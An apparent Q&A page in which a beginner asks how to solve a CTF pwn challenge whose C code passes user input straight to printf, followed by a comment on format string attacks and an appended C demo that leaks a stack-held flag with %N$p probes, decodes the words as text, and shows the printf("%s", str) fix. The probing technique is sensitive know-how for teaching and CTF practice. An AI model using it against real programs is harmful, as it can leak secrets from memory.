
I just started doing CTFs not long ago, and got stuck with this pwn challenge. Here's the code:

#include <stdio.h>
#include <string.h>

void validAnswer(char *str){
    printf("Congratulations!\n");
}

void wrongAnswer(char *str){
    printf("Unfortunately!\n");
    printf(str);   /* user input is used directly as the format string (the challenge's intended weakness) */
    printf("is not the correct answer");
}

int main() {
    char flag[40] = "This should be flag";   /* placeholder value in the posted source; never printed on purpose */
    printf("What is the answer of 1+1\n");
    char answer[64] = "";
    fgets(answer, 64, stdin);                /* bounded read: at most 63 bytes plus the terminator, so no overflow here */
    if(strcmp(answer, "2\n") == 0){
        validAnswer(answer);
    }else{
        wrongAnswer(answer);
    }
    return 0;
}


I think I should overflow the fgets and call the flag, but I cannot get that far because strcmp prevents it. How can I escape it?

Altair
  • You can't "call" the flag; it's not a function. I'd concentrate on the fact that the `wrongAnswer()` function passes user input directly to `printf()`. Assuming the `flag[]` char array hasn't been optimized away by the compiler, it should be in the stack somewhere. Read up on [format string attacks](https://owasp.org/www-community/attacks/Format_string_attack) if you haven't encountered this sort of vulnerability before. – r3mainer Nov 18 '22 at 20:55
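The format-string leak the comment above points at, as an added example that is not part of the original question or of the challenge binary: a stand-in for `wrongAnswer()` that renders the user-supplied format into a buffer, the `%N$p` probe a solver scans argument slots with, a decoder that turns each leaked 64-bit word back into the text a little-endian machine stores, and the one-token fix (`"%s"` as the format) beside it. The flag value, the function names and the `render()` wrapper are constructed for this example; the slot at which the flag shows up depends on compiler, optimisation level and ABI, so the program prints all 40 slots for you to read rather than assuming an offset.

```c
#include <stdarg.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

/* Variadic wrapper around vsnprintf (assumed helper, not from the challenge).
 * Called as render(out, n, user) with no further arguments it does what the
 * challenge's printf(str) does: conversions in `user` are satisfied from
 * whatever sits in the argument registers and on the stack. That is undefined
 * behaviour, and it is exactly the leak. Going through a wrapper also keeps
 * -Wformat-security quiet, so the demo builds with ordinary flags. */
static int render(char *out, size_t n, const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    int len = vsnprintf(out, n, fmt, ap);
    va_end(ap);
    return len;
}

/* Mirrors wrongAnswer(): user input is the format string. */
static int wrong_answer_vulnerable(char *out, size_t n, const char *user)
{
    return render(out, n, user);
}

/* The fix: a literal "%s" is the format, user input is only data. */
static int wrong_answer_fixed(char *out, size_t n, const char *user)
{
    return snprintf(out, n, "%s", user);
}

/* Build "%<idx>$p": direct-parameter-access syntax, which reads the idx-th
 * argument slot without having to emit the slots before it. */
static void build_probe(char *out, size_t n, unsigned idx)
{
    snprintf(out, n, "%%%u$p", idx);
}

/* Decode one leaked 64-bit word as the ASCII a little-endian machine stores it
 * in, so a word copied out of a char array reads as text. Non-printable bytes
 * become '.'; out must have room for 9 bytes. */
static void word_to_ascii(uint64_t word, char out[9])
{
    for (int i = 0; i < 8; i++) {
        unsigned char b = (unsigned char)(word >> (8 * i));
        out[i] = (b >= 0x20 && b < 0x7f) ? (char)b : '.';
    }
    out[8] = '\0';
}

int main(void)
{
    /* Constructed stand-in for the flag, same type and size as the challenge's.
     * It is read through a volatile pointer at the end so the compiler cannot
     * drop the unused array from main's frame. */
    char flag[40] = "This should be flag";
    volatile char *keep = flag;
    char probe[16], leaked[64], text[9];

    /* Scan slots 1..40 with %N$p, the way a solver maps the stack, and decode
     * each word as text: the flag appears as "This sho", "uld be f", "lag.....". */
    for (unsigned i = 1; i <= 40; i++) {
        build_probe(probe, sizeof probe, i);
        wrong_answer_vulnerable(leaked, sizeof leaked, probe);
        uint64_t word = strtoull(leaked, NULL, 16);   /* glibc prints NULL as "(nil)", which parses as 0 */
        word_to_ascii(word, text);
        printf("%2u: %-18s %s\n", i, leaked, text);
    }

    /* The same probe through the fixed function comes back literally. */
    wrong_answer_fixed(leaked, sizeof leaked, probe);
    printf("fixed: %s\n", leaked);
    return keep[0] == 'T' ? 0 : 1;
}
```

Build with `gcc -O0 demo.c -o demo` (the name is arbitrary) and run it; look for consecutive slots whose text column reads `This sho`, `uld be f`, `lag.....`. Stay with `%p` while scanning: `%N$s` dereferences the slot as a pointer and crashes on anything that is not a valid address, so switch to `%s` only for a slot that `%p` has already shown to hold a pointer into the flag buffer (in the challenge, `str` itself is such a pointer into `main`'s frame, and `answer` sits next to `flag` there). The vulnerable and fixed functions differ by a single literal, `printf(str)` versus `printf("%s", str)`, which is the whole of the remediation.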

0 Answers